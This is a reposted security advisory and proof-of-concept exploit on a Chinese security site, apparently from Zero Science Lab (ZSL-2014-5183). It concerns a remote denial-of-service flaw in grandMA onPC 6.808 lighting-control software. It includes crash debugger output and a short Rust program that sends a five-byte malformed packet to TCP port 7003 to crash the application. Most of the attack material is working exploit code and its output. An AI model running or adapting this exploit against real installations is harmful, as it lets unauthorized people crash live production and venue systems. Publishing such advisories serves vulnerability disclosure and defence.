首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulne
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2014-04-08  
/*
  
MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit
  
  
Vendor: MA Lighting Technology GmbH
Product web page: http://www.malighting.com
Affected version: grandMA series 1 onPC Software 6.808 (6.801)
  
Summary: The grandMA onPC software incorporates all functions of a grandMA
console and offers you its full potential on your notebook or PC. You can
use grandMA onPC for running, programming or offline pre-programming, as
well as a smart backup solution within the grandMA system. With the MA onPC
command wing and MA onPC fader wing MA Lighting has developed a sophisticated
hardware extension perfectly suited for the grandMA onPC software.
  
Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
issue when processing socket connection negotiation. This issue occurs when
the application handles a single malformed packet over TCP port 7003, resulting
in a crash.
  
===========================================================================
  
(1324.be4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlEnterCriticalSection+0x12:
77ce22c2 f00fba3000      lock btr dword ptr [eax],0   ds:002b:3535393f=????????
  
--
  
303.640 GMA : RR NEW  STATION IN NETWORK 127.0.0.1(100) AS Standalone
367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
367.180 CC  : ******* EXCEPTION **************************
367.180 CC  : * ACCESS_VIOLATION
367.180 CC  : * EAX = 37363341  EBX =  6D856B0
367.180 CC  : * ECX = 37363339  EDX =  B78F41C
367.180 CC  : * ESI = 37363341  EDI = 3736333D
367.180 CC  : * DESKTYP : GMA [Windows]
367.180 CC  : * VERSION : 6.808 STREAMING : 6801
367.180 CC  : ********************************************
367.240 CC  : 0x775522c2 RtlEnterCriticalSection() + 0x12
  
===========================================================================
  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN)
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2014-5183
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php
  
  
31.03.2014
  
*/
  
  
use std::io::net::ip::SocketAddr;
use std::io::net::tcp::TcpStream;
  
fn bann() {
    println!("
    +======================================+
    | grandMA onPC 6.808 Denial of Service |
    |--------------------------------------|
    |                                      |
    |           ID: ZSL-2014-5183          |
    +======================================+
    ");
}
  
fn main() {
    bann();
    println!("\n[*] Sending packet to local host on tcp port 7003\n");
    let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
    let mut socket = TcpStream::connect(addr).unwrap();
    socket.write(bytes!("\x74\x30\x30\x74\x21"));
    println!("[*] Crashed!\n");
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ibstat $PATH Privilege Escalat
·Google Voice Private/Unknown N
·JIRA Issues Collector Director
·MacOSX 10.9.2/XNU HFS Hard Lin
·Linksys E-Series TheMoon Remot
·Fritz!Box Webcm Unauthenticate
·Kyocera FS5250 Cross Site Scri
·WinRAR Filename Spoofing
·BlazeDVD Pro Player 6.1 - Stac
·PhonerLite 2.14 SIP Soft Phone
·OpenSSL TLS Heartbeat Extensio
·Vtiger Install Unauthenticated
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved